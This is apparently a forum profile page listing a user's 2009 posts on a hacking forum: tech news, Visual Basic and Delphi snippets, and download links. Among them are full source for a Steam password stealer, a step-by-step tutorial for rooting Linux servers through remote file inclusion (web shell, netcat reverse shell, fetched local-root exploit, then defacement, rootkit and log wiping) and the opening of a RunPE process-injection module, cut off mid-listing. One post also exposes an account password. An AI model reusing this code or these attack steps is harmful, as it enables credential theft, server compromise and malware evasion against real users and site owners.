Nytro

Everything posted by Nytro

  1. Windows 7 will have DirectX 11 "graphics"
    by Mina Hutterer | 7 August 2009
    With Windows 7, Microsoft wants to deliver an operating system able to make efficient use of the video hardware in the system. The company is working closely with NVIDIA and AMD (ATI) to make sure there will be no problems at all between Windows 7 DirectX 11 and the drivers of cards with GeForce and Radeon chipsets. One of the main advantages of DirectX 11 is, for example, the operating system's ability to play video without loading the CPU, directly through the graphics card. Moreover, an AMD representative says that DirectX 11 will allow a level of realism in games that was impossible until now. AMD plans to launch the first DirectX 11-compatible cards in October 2009, together with the launch of Windows 7.
    Here are the main features of DirectX 11:
    o Full support (including all DX11 hardware features) on Windows Vista as well as future versions of Windows
    o Compatibility with DirectX 10 and 10.1 hardware, as well as support for new DirectX 11 hardware
    o New compute shader technology that lays the groundwork for the GPU to be used for more than just 3D graphics, so that developers can take advantage of the graphics card as a parallel processor
    o Multi-threaded resource handling that will allow games to better take advantage of multi-core machines
    o Support for tessellation, which blurs the line between super high quality pre-rendered scenes and scenes rendered in real-time, allowing game developers to refine models to be smoother and more attractive when seen up close
  2. Cryptosy Mod By Smokin3000 Download: http://www.2shared.com/file/7135910/43a75220/Cryptosy_Mod_By_Smokin3000.html
  3. '---------------------------------------------------------------------------------------
    ' Module      : mLockedFiles
    ' DateTime    : 11/08/2009 02:10
    ' Author      : SqUeEzEr
    ' Mail        : scott_van_dinter@hotmail.com@hotmail.com
    ' Purpose     : Close filehandles owned by other processes
    ' Usage       : At your own risk
    ' Requirements: None
    ' Distribution: You can freely use this code in your own
    '               applications, but you may not reproduce
    '               or publish this code on any web site,
    '               online service, or distribute as source
    '               on any media without express permission.
    '
    ' Reference   : Deleting locked files
    '               http://www.codeguru.com/cpp/w-p/files/fileio/article.php/c1287
    '
    ' History     : 11/08/2009 First Cut....................................................
    '---------------------------------------------------------------------------------------
    Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As Any, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long
    Private Declare Function NtDuplicateObject Lib "NTDLL.DLL" (ByVal hSourceProcess As Long, ByVal hSourceHandle As Long, ByVal hCopyProcess As Long, CopyHandle As Long, ByVal DesiredAccess As Long, ByVal Attributes As Long, ByVal Options As Long) As Long
    Private Declare Function NtClose Lib "NTDLL.DLL" (ByVal ObjectHandle As Long) As Long
    Public Declare Function CreateToolhelp32Snapshot Lib "Kernel32.dll" (ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long
    Public Declare Function Process32First Lib "Kernel32.dll" (ByVal hSnapshot As Long, lppe As PROCESSENTRY32) As Long
    Public Declare Function Process32Next Lib "Kernel32.dll" (ByVal hSnapshot As Long, lppe As PROCESSENTRY32) As Long
    Public Declare Function CloseHandle Lib "Kernel32.dll" (ByVal hObject As Long) As Long
    Public Declare Function OpenProcess Lib "Kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcId As Long) As Long
    Public Declare Function RtlAdjustPrivilege Lib "ntdll" (ByVal Privilege As Long, ByVal Enable As Boolean, ByVal Client As Boolean, WasEnabled As Long) As Long

    Public Type PROCESSENTRY32
        dwSize As Long
        cntUsage As Long
        th32ProcessID As Long       ' Identifier of the process
        th32DefaultHeapID As Long
        th32ModuleID As Long
        cntThreads As Long
        th32ParentProcessID As Long
        pcPriClassBase As Long
        dwFlags As Long
        szExeFile As String * 260
    End Type

    Private Const FILE_FLAG_BACKUP_SEMANTICS As Long = &H2000000
    Private Const GENERIC_ALL As Long = &H10000000
    Private Const FILE_SHARE_READ As Long = &H1&
    Private Const FILE_SHARE_WRITE As Long = &H2&
    Private Const OPEN_EXISTING As Long = 3&
    Private Const DUPLICATE_CLOSE_SOURCE = &H1
    Private Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
    Public Const TH32CS_SNAPPROCESS As Long = &H2

    Public Function Closehandles(sFileName As String) As Boolean
        Dim hFile As Long
        Dim pInfo As PROCESSENTRY32
        Dim hSnapshot As Long
        Dim lSuccess As Long
        Dim lRet As Long
        Dim hProcess As Long

        ' Privilege 20 = SeDebugPrivilege, needed to open other processes
        Call RtlAdjustPrivilege(20, True, True, 0)
        ' Share flags must be combined with Or (And of &H1 and &H2 is 0, i.e. no sharing)
        hFile = CreateFile(sFileName, GENERIC_ALL, FILE_SHARE_WRITE Or FILE_SHARE_READ, 0&, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, 0&)
        hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
        pInfo.dwSize = Len(pInfo)
        lSuccess = Process32First(hSnapshot, pInfo)
        If hSnapshot = -1 Then
            Debug.Print "Unable to take snapshot of process list!"
        Else
            Do While lSuccess <> 0
                hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, pInfo.th32ProcessID)
                Call NtDuplicateObject(hProcess, hFile, 0, ByVal 0, 0, 0, DUPLICATE_CLOSE_SOURCE)
                Call NtClose(hProcess)
                pInfo.dwSize = Len(pInfo)
                lSuccess = Process32Next(hSnapshot, pInfo)
            Loop
            lRet = CloseHandle(hSnapshot)
        End If
        Closehandles = True
    End Function

    Usage:
    If Closehandles("C:\file.txt") Then Kill "C:\file.txt"
  4. While many ActiveX components are slowly being replaced with technologies considered more secure and/or web-mature, many developers still utilise ActiveX controls as a quick way to push advanced functionality out to web browsers. ActiveX security is based on digital signatures: if you trust the source of the component, then it is safe to run the control. That said, when the control is run, it runs like any other Win32 desktop application and has access to the same resources, unlike Java, which executes inside a safe environment known as a "sandbox", thus limiting what the Applet has access to. Well, that's how the sandbox works in theory at least. In other words, you had better trust the authors of the ActiveX component. In this paper, I won't be focusing on the ActiveX security model, but rather on the identification of vulnerabilities in the ActiveX control itself, not in the way the control interacts with its environment. This is an interesting topic, as the presence of such vulnerabilities could enable malicious individuals to compromise a user's computer, simply by guiding them to a malicious web site. In other words, no actions on the part of the user are required for remote code execution.
    The paper (by shape) can be viewed here: http://blog.sat0ri.com/wp-content/uploads/2009/08/Identifying-Vulnerabilities-in-ActiveX-Controls.pdf
  5. Done, I've understood how things stand and I think I've also made peace.
  6. Out of curiosity, who's the retard that copies from this forum?
  7. Yes, and the answers look familiar to me. Kid with no future. PS: Who the hell is writing from my account? User: Nytro Pass: adminxxx
  8. White Hat Hacking course, part 1: http://www.tudy.ro/2008/11/15/white-hat-hacking-course-part-1/
    White Hat Hacking course, part 2: http://www.tudy.ro/2008/11/24/white-hat-hacking-part-2/
    White Hat Hacking, part 3: http://www.tudy.ro/2008/12/05/white-hat-hacking-part-3/
  9. by -bRx-
    Function UltimoNickUsadoInGame:String; = latest nick in game
    Function UserCounterStrikeRate:String; = latest rate set by user
    Function DiretorioDaSteam:String; = steam directory
    Function DiretorioDoExecutavelSteam:String; = exe steam dir
    Function ConfiguracaoDeIdioma:String; = language
    Function EnviarDadosSTEAM:String; = all results in this function

    {*********************************************************************************************
     [ASCII-art banner, not recoverable after extraction]
     *********************************************************************************************
     Author: counterstrikewi and -bRx-  please give credits in case you use it }

    unit SteamStealerUnitBybRx;

    interface

    uses
      Windows, CompressionStreamUnit;

    type
      LongRec = packed record
        case Integer of
          0: (Lo, Hi: Word);
          1: (Words: array [0..1] of Word);
          2: (Bytes: array [0..3] of Byte);
      end;

      { TStringStream }
      TStringStream = class(TStream)
      private
        FDataString: string;
        FPosition: Integer;
      protected
        procedure SetSize(NewSize: Longint); override;
      public
        constructor Create(const AString: string);
        function Read(var Buffer; Count: Longint): Longint; override;
        function ReadString(Count: Longint): string;
        function Seek(Offset: Longint; Origin: Word): Longint; override;
        function Write(const Buffer; Count: Longint): Longint; override;
        procedure WriteString(const AString: string);
        property DataString: string read FDataString;
      end;

    const
      { File open modes }
    {$IFDEF LINUX}
      fmOpenRead       = O_RDONLY;
      fmOpenWrite      = O_WRONLY;
      fmOpenReadWrite  = O_RDWR;
      // fmShareCompat not supported
      fmShareExclusive = $0010;
      fmShareDenyWrite = $0020;
      // fmShareDenyRead not supported
      fmShareDenyNone  = $0030;
    {$ENDIF}
    {$IFDEF MSWINDOWS}
      fmOpenRead       = $0000;
      fmOpenWrite      = $0001;
      fmOpenReadWrite  = $0002;
      fmShareCompat    = $0000 platform; // DOS compatibility mode is not portable
      fmShareExclusive = $0010;
      fmShareDenyWrite = $0020;
      fmShareDenyRead  = $0030 platform; // write-only not supported on all platforms
      fmShareDenyNone  = $0040;
    {$ENDIF}

    function SteamUserName: String;
    function SteamPassword: String;
    function UltimoNickUsadoInGame: string;
    function UserCounterStrikeRate: string;
    function DiretorioDaSteam: string;
    function DiretorioDoExecutavelSteam: string;
    function ConfiguracaoDeIdioma: string;
    function EnviarDadosSTEAM: string;

    type
      TSteamDecryptDataForThisMachine = function(EncryptedData: PChar; EncryptedDataLength: Integer; DecryptedBuffer: Pointer; DecryptedBufferSize: Integer; DecryptedDataSize: PUINT): Integer; cdecl;

    var
      SteamPath: String;
      StringStream: TStringStream;
      FileStream: TFileStream;
      I: Integer;
      UserName: PChar;
      EncryptedPassword: PChar;
      DecryptionKey: TSteamDecryptDataForThisMachine;
      PasswordLength: UINT;
      Password: array[0..99] of char;

    implementation

    function PegaValor(const Key: HKEY; const Chave, Valor: String): String;
    var
      handle: HKEY;
      Tipo, Tam: Cardinal;
      Buffer: String;
    begin
      RegOpenKeyEx(Key, PChar(Chave), 0, KEY_ALL_ACCESS, handle);
      Tipo := REG_NONE;
      RegQueryValueEx(Handle, PChar(Valor), nil, @Tipo, nil, @Tam);
      SetString(Buffer, nil, Tam);
      RegQueryValueEx(Handle, PChar(Valor), nil, @Tipo, PByte(PChar(Buffer)), @Tam);
      Result := PChar(Buffer);
      RegCloseKey(handle);
      Result := PChar(Buffer);
    end;

    procedure FreeAndNil(var Obj);
    var
      Temp: TObject;
    begin
      Temp := TObject(Obj);
      Pointer(Obj) := nil;
      Temp.Free;
    end;

    { TStringStream }

    constructor TStringStream.Create(const AString: string);
    begin
      inherited Create;
      FDataString := AString;
    end;

    function TStringStream.Read(var Buffer; Count: Longint): Longint;
    begin
      Result := Length(FDataString) - FPosition;
      if Result > Count then Result := Count;
      Move(PChar(@FDataString[FPosition + 1])^, Buffer, Result);
      Inc(FPosition, Result);
    end;

    function TStringStream.Write(const Buffer; Count: Longint): Longint;
    begin
      Result := Count;
      SetLength(FDataString, (FPosition + Result));
      Move(Buffer, PChar(@FDataString[FPosition + 1])^, Result);
      Inc(FPosition, Result);
    end;

    function TStringStream.Seek(Offset: Longint; Origin: Word): Longint;
    begin
      case Origin of
        soFromBeginning: FPosition := Offset;
        soFromCurrent:   FPosition := FPosition + Offset;
        soFromEnd:       FPosition := Length(FDataString) - Offset;
      end;
      if FPosition > Length(FDataString) then
        FPosition := Length(FDataString)
      else if FPosition < 0 then
        FPosition := 0;
      Result := FPosition;
    end;

    function TStringStream.ReadString(Count: Longint): string;
    var
      Len: Integer;
    begin
      Len := Length(FDataString) - FPosition;
      if Len > Count then Len := Count;
      SetString(Result, PChar(@FDataString[FPosition + 1]), Len);
      Inc(FPosition, Len);
    end;

    procedure TStringStream.WriteString(const AString: string);
    begin
      Write(PChar(AString)^, Length(AString));
    end;

    procedure TStringStream.SetSize(NewSize: Longint);
    begin
      SetLength(FDataString, NewSize);
      if FPosition > NewSize then FPosition := NewSize;
    end;

    function StrLen(const Str: PChar): Cardinal; assembler;
    asm
            MOV     EDX,EDI
            MOV     EDI,EAX
            MOV     ECX,0FFFFFFFFH
            XOR     AL,AL
            REPNE   SCASB
            MOV     EAX,0FFFFFFFEH
            SUB     EAX,ECX
            MOV     EDI,EDX
    end;

    function FileAge(const FileName: string): Integer;
    {$IFDEF MSWINDOWS}
    var
      Handle: THandle;
      FindData: TWin32FindData;
      LocalFileTime: TFileTime;
    begin
      Handle := FindFirstFile(PChar(FileName), FindData);
      if Handle <> INVALID_HANDLE_VALUE then
      begin
        Windows.FindClose(Handle);
        if (FindData.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) = 0 then
        begin
          FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime);
          if FileTimeToDosDateTime(LocalFileTime, LongRec(Result).Hi, LongRec(Result).Lo) then Exit;
        end;
      end;
      Result := -1;
    end;
    {$ENDIF}
    {$IFDEF LINUX}
    var
      st: TStatBuf;
    begin
      if stat(PChar(FileName), st) = 0 then
        Result := st.st_mtime
      else
        Result := -1;
    end;
    {$ENDIF}

    function FileExists(const FileName: string): Boolean;
    {$IFDEF MSWINDOWS}
    begin
      Result := FileAge(FileName) <> -1;
    end;
    {$ENDIF}
    {$IFDEF LINUX}
    begin
      Result := euidaccess(PChar(FileName), F_OK) = 0;
    end;
    {$ENDIF}

    // Senha:=PegaValor(HKEY_LOCAL_MACHINE,'Software\Vitalwerks\DUC','Password');

    function SteamUserName: String;
    begin
      try
        SteamPath := PegaValor(HKEY_CURRENT_USER, 'Software\Valve\Steam\', 'SteamPath');
        //Locates UserName within the SteamAppData.vdf file
        FileStream := TFileStream.Create(SteamPath + '\config\SteamAppData.vdf', fmOpenRead);
        StringStream := TStringStream.Create('');
        StringStream.CopyFrom(FileStream, FileStream.Size);
        FreeAndNil(FileStream);
        I := Pos('AutoLoginUser', StringStream.DataString);
        I := I + 17;
        UserName := PChar(copy(StringStream.DataString, I, Pos('"', copy(StringStream.DataString, I, 100)) - 1));
        FreeAndNil(StringStream);
        Result := UserName;
      except
        Result := 'Error';
      end;
    end;

    function SteamPassword: String;
    begin
      try
        SteamPath := PegaValor(HKEY_CURRENT_USER, 'Software\Valve\Steam\', 'SteamPath');
        //Locates Encrypted Password within the ClientRegistry.blob file
        if not FileExists(SteamPath + '/ClientRegistry.Blob') then
        begin
          Result := 'Não foi possível encontrar o arquivo necessário para pegar o password.';
          Exit;
        end
        else
        begin
          FileStream := TFileStream.Create(SteamPath + '\ClientRegistry.blob', fmOpenRead);
          StringStream := TStringStream.Create('');
          StringStream.CopyFrom(FileStream, FileStream.Size);
          FreeAndNil(FileStream);
          I := Pos('Phrase', StringStream.DataString);
          I := I + 40;
          EncryptedPassword := PChar(copy(StringStream.DataString, I, 255));
          FreeAndNil(StringStream);
          //Uses SteamDecryptDataForThisMachine function from Steam.dll to decrypt password
          DecryptionKey := GetProcAddress(LoadLibrary(PChar(SteamPath + '\steam.dll')), 'SteamDecryptDataForThisMachine');
          DecryptionKey(EncryptedPassword, StrLen(EncryptedPassword), @Password, 100, @PasswordLength);
          Result := Password;
        end;
      except
        Result := 'Error';
      end;
    end;

    function UltimoNickUsadoInGame: string;
    begin
      Result := PegaValor(HKEY_CURRENT_USER, 'Software\Valve\Steam\', 'LastGameNameUsed');
    end;

    function UserCounterStrikeRate: string;
    begin
      Result := PegaValor(HKEY_CURRENT_USER, 'Software\Valve\Steam\', 'Rate');
    end;

    function DiretorioDaSteam: string;
    begin
      Result := PegaValor(HKEY_CURRENT_USER, 'Software\Valve\Steam\', 'SteamPath');
    end;

    function DiretorioDoExecutavelSteam: string;
    begin
      Result := PegaValor(HKEY_CURRENT_USER, 'Software\Valve\Steam\', 'SteamExe');
    end;

    function ConfiguracaoDeIdioma: string;
    begin
      Result := PegaValor(HKEY_CURRENT_USER, 'Software\Valve\Steam\', 'Language');
    end;

    function EncontrouSteam: Boolean;
    var
      VerificaString: string;
    begin
      Result := False;
      VerificaString := PegaValor(HKEY_CURRENT_USER, 'Software\Valve\Steam\', 'Language');
      if VerificaString <> '' then Result := True else Result := False;
    end;

    function EnviarDadosSTEAM: string;
    var
      Enter: string;
    begin
      Enter := #13#10;
      if EncontrouSteam then
      begin
        Result := 'Login: ' + SteamUserName + Enter +
                  'Senha: ' + SteamPassword + Enter +
                  'Ultimo Nick usado: ' + UltimoNickUsadoInGame + Enter +
                  'Rate do Usuário: ' + UserCounterStrikeRate + Enter +
                  'Diretório da Steam: ' + DiretorioDaSteam + Enter +
                  'Diretório do Executavel Steam: ' + DiretorioDoExecutavelSteam + Enter +
                  'Configuração de Idioma do Usuário: ' + ConfiguracaoDeIdioma + Enter;
      end
      else
        Result := 'Não foi possível encontrar os dados. Possíveis causas: Diretório da steam ou DLL não encontrada, ou talvez o arquivo esteja sendo usada por outro processo';
    end;

    end.

    Download: http://www.2shared.com/file/7117962/32213e20/SteamStealer.html
  10. by mjrod5: You can flame me or whatever you want... Here is code I made =) Seems like Delphi doesn't support invoke, only call xP Have fun doing nothing with this

    program InlineASM;

    uses
      Windows;

    var
      _msg: String = 'Inline ASM, Delphi';
      _cpt: String = 'woot!';

    begin
      asm
        //MessageBox: function(hWnd: HWND; lpText, lpCaption: PAnsiChar; uType: UINT): Integer;
        push 0            //uType
        push _cpt         //lpCaption
        push _msg         //lpText
        push 0            //hWnd
        call MessageBox   //Call the MessageBox API with the params you pushed
        //Delphi equivalent would be
        //MessageBox(0, PChar(_msg), PChar(_cpt), 0);
      end;
    end.
  11. Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (lpVersionInformation As OSVERSIONINFO) As Long

    Private Type OSVERSIONINFO
        OSVersionInfoSize As Long
        MajorVersion As Long
        MinorVersion As Long
        BuildNumber As Long
        PlatformId As Long
        szCSDVersion As String * 128
    End Type

    Private Type OSVERSIONINFOEX
        dwOSVersionInfoSize As Long
        dwMajorVersion As Long
        dwMinorVersion As Long
        dwBuildNumber As Long
        dwPlatformId As Long
        szCSDVersion As String * 128
        wServicePackMajor As Integer
        wServicePackMinor As Integer
        wSuiteMask As Integer
        wProductType As Byte
        wReserved As Byte
    End Type

    Public Function GetWindowsVersion() As String
        Dim OS As OSVERSIONINFO
        Dim durum As Boolean
        Dim version As String

        OS.OSVersionInfoSize = Len(OS)
        durum = GetVersionEx(OS)
        ' PlatformId.Major.Minor, e.g. 2.5.1 = VER_PLATFORM_WIN32_NT, 5.1 = XP
        version = OS.PlatformId & "." & OS.MajorVersion & "." & OS.MinorVersion

        Select Case version
            Case "1.4.0":  GetWindowsVersion = "Win 95"
            Case "1.4.10": GetWindowsVersion = "Win 98"
            Case "1.4.98": GetWindowsVersion = "Win ME"
            Case "2.3.51": GetWindowsVersion = "Win NT 3"
            Case "2.4.0":  GetWindowsVersion = "Win NT 4"
            Case "2.5.0":  GetWindowsVersion = "Win 2000"
            Case "2.5.1":  GetWindowsVersion = "Win XP"
            Case "2.6.0":  GetWindowsVersion = "Win Vista"
            Case "2.6.1":  GetWindowsVersion = "Win Seven"
            Case Else:     GetWindowsVersion = "Unknown"
        End Select
    End Function

    Private Sub Form_Load()
        MsgBox GetWindowsVersion()
    End Sub
  12. DIE (Detect it Easy) detects most common packers, cryptors and compilers for PE files. Download: http://www.2shared.com/file/7117852/18ce07d4/Detect_it_easy.html
  13. R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF)
    Author: An@sA_StAxtH
    Mail/MSN: admin@cyberanarchy.org / anasa_staxth@hotmail.com
    For Cyber Anarchy (Nov. 2007)
    -----------------------------------------------------------------------
    You will need:
    - Vulnerable Site in R.F.I.
    - Shell for R.F.I. (e.g. c99, r57 or other)
    - NetCat
    - Local Root Exploit (depending on the kernel and the version)

    The aim of this tutorial is to give a very general picture of the process of Rooting a Linux Server with Safe Mod: OFF.

    Suppose that we have found a site with an R.F.I. vulnerability:
    http://www.hackedsite.com/folder/index.html?page=
    We can run a shell exploiting Remote File Inclusion, as follows:
    http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?
    where evilscript.txt is our web shell that we have already uploaded to our site (www.mysite.com in the folder: shells).

    After we enter the shell, first of all we will see the version of the kernel at the top of the page or by typing uname -a in the command line.

    To continue we must connect with a backconnection to the box. This can be done in two ways if we have a suitable shell. We can use the Back-Connect module of the r57/c99 shell or upload a backconnector in a writable folder. In most of the shells there is a backconnection feature without having to upload the Connect Back Shell (or another shell in perl/c). We will analyze the first way, which is inside the shell (in our example the shell is r57).

    Initially we open NetCat and set it to listen on a specific port (this port must be correctly opened/forwarded in NAT/Firewall if we have a router) in the following way:
    We will type 11457 in the port input (this is the default port for the last versions of r57 shell). We can use another port too.
    We press Windows Start -> Run -> and we type: cmd
    After that we go to the NetCat directory, e.g.:
    cd C:\Program Files\Netcat
    And we type the following command:
    nc -n -l -v -p 11457
    NetCat responds:
    listening on [any] 11457 ...

    In the central page of the r57 shell we find, under the menu ::: Net::, the back-connect option. In the IP form we will type our IP (www.cmyip.com to see our IP if we have a dynamic one). In the Port form we will put the port that we opened and that NetCat listens on. If we press connect the shell will respond:
    Now script try connect to <IP here> port 11457 ...
    If our settings are correct NetCat will give us a shell to the server.

    Now we will continue to the Rooting process. We must find a writable folder in order to download and compile the Local Root Exploit that will give us root privileges in the box. Depending on the version of the Linux kernel there are different exploits. Sometimes the exploits fail to run because some boxes are patched or we don't have the correct permissions.

    List of the exploits/kernel:
    2.4.17 -> newlocal, kmod, uselib24
    2.4.18 -> brk, brk2, newlocal, kmod
    2.4.19 -> brk, brk2, newlocal, kmod
    2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
    2.4.21 -> brk, brk2, ptrace, ptrace-kmod
    2.4.22 -> brk, brk2, ptrace, ptrace-kmod
    2.4.22-10 -> loginx
    2.4.23 -> mremap_pte
    2.4.24 -> mremap_pte, uselib24
    2.4.25-1 -> uselib24
    2.4.27 -> uselib24
    2.6.2 -> mremap_pte, krad, h00lyshit
    2.6.5 -> krad, krad2, h00lyshit
    2.6.6 -> krad, krad2, h00lyshit
    2.6.7 -> krad, krad2, h00lyshit
    2.6.8 -> krad, krad2, h00lyshit
    2.6.8-5 -> krad2, h00lyshit
    2.6.9 -> krad, krad2, h00lyshit
    2.6.9-34 -> r00t, h00lyshit
    2.6.10 -> krad, krad2, h00lyshit
    2.6.13 -> raptor, raptor2, h0llyshit, prctl
    2.6.14 -> raptor, raptor2, h0llyshit, prctl
    2.6.15 -> raptor, raptor2, h0llyshit, prctl
    2.6.16 -> raptor, raptor2, h0llyshit, prctl

    We will see the case of the 2.6.8 Linux kernel. We will need the h00lyshit exploit.
    Some sites where we can find Local Root Exploits:
    www.milw0rm (Try Search: "linux kernel")
    Other sites: www.packetstormsecurity.org | www.arblan.com or try Googlin', you can find 'em all.

    We can find writable folders/files by typing:
    find / -perm -2 -ls
    We can use the /tmp folder, which is a standard writable folder. We type:
    cd /tmp
    To download the local root exploit we can use a download command for linux like wget. For example:
    wget http://www.arblan.com/localroot/h00lyshit.c
    where http://www.arblan.com/localroot/h00lyshit.c is the url of h00lyshit.
    After the download we must compile the exploit (read the instructions of the exploit before compiling). For the h00lyshit we must type:
    gcc h00lyshit.c -o h00lyshit
    Now we have created the executable file: h00lyshit. The command to run this exploit is:
    ./h00lyshit <very big file on the disk>
    We need a very big file on the disk in order to run successfully and to get root. We must create a big file in /tmp or in another writable folder. The command is:
    dd if=/dev/urandom of=largefile count=2M
    where largefile is the filename. We must wait 2-3 minutes for the file creation. If this command fails we can try:
    dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024
    Now we can proceed to the last step. We can run the exploit by typing:
    ./h00lyshit largefile
    or
    ./h00lyshit /tmp/largefile
    (if we are in a different writable folder and the largefile is created in /tmp)
    If there are no running errors (maybe the kernel is patched or something is wrong with the exploit run or the large file) we will get root.
    To check if we got root:
    id
    or
    whoami
    If it says root we got root!
    Now we can deface/mass deface all the sites of the server or set up a rootkit (e.g. SSHDoor) and take ssh/telnet shell access to the server. We must erase all logs in order to be safe, with a log cleaner. A good cleaner for this job is the MIG Log Cleaner.
    <An@sA_StAxtH> <admin@cyberanarchy.org> * <www.cyberanarchy.org>
  14. Ultrasurf V9.5 (100% Anonymous Surfing!)
    Privacy: Protect Internet privacy with anonymous surfing and browsing -- hide IP addresses and locations, clean browsing history, cookies & more ...
    Security: Completely transparent data transfer and high level encryption of the content allow you to surf the web with high security.
    Freedom: UltraSurf allows you to overcome the censorship and blockage on the Internet. You can browse any website freely, so as to obtain true information from the free world.
    With this program you can change the proxies of Internet Explorer and get into the pages that the computer administrators have locked at places such as schools, libraries and others ... To operate it, open it and wait until it writes "successfully connected to server!", then open Internet Explorer, go to any page you want and we are unlocked! You can also use it as a normal Proxy Server in Internet Explorer to surf 100% anonymously online.
    Download: http://www.mediafire.com/download.php?jyjtymyjyvm
  15. Who has chmod 777 on the folder where all the files are?
  16. re: Yes, that's her, I went to a contest in Tg. Jiu and she was there too.
  17. by Karcrack (modded cobein's RunPE) Native & Just RtlMoveMemory

    '---------------------------------------------------------------------------------------
    ' Module      : cNtPEL
    ' DateTime    : 30/06/2009 06:32
    ' Author      : Cobein
    ' Mail        : cobein27@hotmail.com
    ' WebPage     : http://www.advancevb.com.ar (updated =D)
    ' Purpose     : Inject Exe
    ' Usage       : At your own risk
    ' Requirements: None
    ' Distribution: You can freely use this code in your own
    '               applications, but you may not reproduce
    '               or publish this code on any web site,
    '               online service, or distribute as source
    '               on any media without express permission.
    '
    ' Thanks to   : This is gonna be a looong list xD
    '               Batfitch - kernel base asm
    '               Karcrack - For helping me to debug and test it
    '               Paul Caton - vTable patch examples
    '               rm_code - First call api prototype
    '               and different books and pappers
    '
    ' Compile     : P-Code !!!
    '
    ' Comments    : Coded on top of the invoke module.
    '
    ' History     : 30/06/2009 First Cut....................................................
    '               02/08/2009 Modded By Karcrack, Now is NtRunPEL, thanks Slayer (;........
    '---------------------------------------------------------------------------------------
    Option Explicit

    Private Const IMAGE_DOS_SIGNATURE As Long = &H5A4D&
    Private Const IMAGE_NT_SIGNATURE As Long = &H4550&
    Private Const SIZE_DOS_HEADER As Long = &H40
    Private Const SIZE_NT_HEADERS As Long = &HF8
    Private Const SIZE_EXPORT_DIRECTORY As Long = &H28
    Private Const SIZE_IMAGE_SECTION_HEADER As Long = &H28
    Private Const THUNK_APICALL As String = "8B4C240851<PATCH1>E8<PATCH2>5989016631C0C3"
    Private Const THUNK_KERNELBASE As String = "8B5C240854B830000000648B008B400C8B401C8B008B400889035C31C0C3"
    Private Const PATCH1 As String = "<PATCH1>"
    Private Const PATCH2 As String = "<PATCH2>"
    Private Const CONTEXT_FULL As Long = &H10007
    Private Const CREATE_SUSPENDED As Long = &H4
    Private Const MEM_COMMIT As Long = &H1000
    Private Const MEM_RESERVE As Long = &H2000
    Private Const PAGE_EXECUTE_READWRITE As Long = &H40

    Private Type STARTUPINFO
        cb As Long
        lpReserved As Long
        lpDesktop As Long
        lpTitle As Long
        dwX As Long
        dwY As Long
        dwXSize As Long
        dwYSize As Long
        dwXCountChars As Long
        dwYCountChars As Long
        dwFillAttribute As Long
        dwFlags As Long
        wShowWindow As Integer
        cbReserved2 As Integer
        lpReserved2 As Long
        hStdInput As Long
        hStdOutput As Long
        hStdError As Long
    End Type

    Private Type PROCESS_INFORMATION
        hProcess As Long
        hThread As Long
        dwProcessID As Long
        dwThreadID As Long
    End Type

    Private Type FLOATING_SAVE_AREA
        ControlWord As Long
        StatusWord As Long
        TagWord As Long
        ErrorOffset As Long
        ErrorSelector As Long
        DataOffset As Long
        DataSelector As Long
        RegisterArea(1 To 80) As Byte
        Cr0NpxState As Long
    End Type

    Private Type CONTEXT
        ContextFlags As Long
        Dr0 As Long
        Dr1 As Long
        Dr2 As Long
        Dr3 As Long
        Dr6 As Long
        Dr7 As Long
        FloatSave As FLOATING_SAVE_AREA
        SegGs As Long
        SegFs As Long
        SegEs As Long
        SegDs As Long
        Edi As Long
        Esi As Long
        Ebx As Long
        Edx As Long
        Ecx As Long
        Eax As Long
        Ebp As Long
        Eip As Long
        SegCs As Long
        EFlags As Long
        Esp As Long
        SegSs As Long
    End Type

    Private Type IMAGE_DOS_HEADER
        e_magic As Integer
        e_cblp As Integer
        e_cp As Integer
        e_crlc As Integer
        e_cparhdr As Integer
        e_minalloc As Integer
        e_maxalloc As Integer
        e_ss As Integer
        e_sp As Integer
        e_csum As Integer
        e_ip As Integer
        e_cs As Integer
        e_lfarlc As Integer
        e_ovno As Integer
        e_res(0 To 3) As Integer
        e_oemid As Integer
        e_oeminfo As Integer
        e_res2(0 To 9) As Integer
        e_lfanew As Long
    End Type

    Private Type IMAGE_FILE_HEADER
        Machine As Integer
        NumberOfSections As Integer
        TimeDateStamp As Long
        PointerToSymbolTable As Long
        NumberOfSymbols As Long
        SizeOfOptionalHeader As Integer
        Characteristics As Integer
    End Type

    Private Type IMAGE_DATA_DIRECTORY
        VirtualAddress As Long
        Size As Long
    End Type

    Private Type IMAGE_OPTIONAL_HEADER
        Magic As Integer
        MajorLinkerVersion As Byte
        MinorLinkerVersion As Byte
        SizeOfCode As Long
        SizeOfInitializedData As Long
        SizeOfUnitializedData As Long
        AddressOfEntryPoint As Long
        BaseOfCode As Long
        BaseOfData As Long
        ImageBase As Long
        SectionAlignment As Long
        FileAlignment As Long
        MajorOperatingSystemVersion As Integer
        MinorOperatingSystemVersion As Integer
        MajorImageVersion As Integer
        MinorImageVersion As Integer
        MajorSubsystemVersion As Integer
        MinorSubsystemVersion As Integer
        W32VersionValue As Long
        SizeOfImage As Long
        SizeOfHeaders As Long
        CheckSum As Long
        SubSystem As Integer
        DllCharacteristics As Integer
        SizeOfStackReserve As Long
        SizeOfStackCommit As Long
        SizeOfHeapReserve As Long
        SizeOfHeapCommit As Long
        LoaderFlags As Long
        NumberOfRvaAndSizes As Long
        DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
    End Type

    Private Type IMAGE_NT_HEADERS
        Signature As Long
        FileHeader As IMAGE_FILE_HEADER
        OptionalHeader As IMAGE_OPTIONAL_HEADER
    End Type

    Private Type IMAGE_EXPORT_DIRECTORY
        Characteristics As Long
        TimeDateStamp As Long
        MajorVersion As Integer
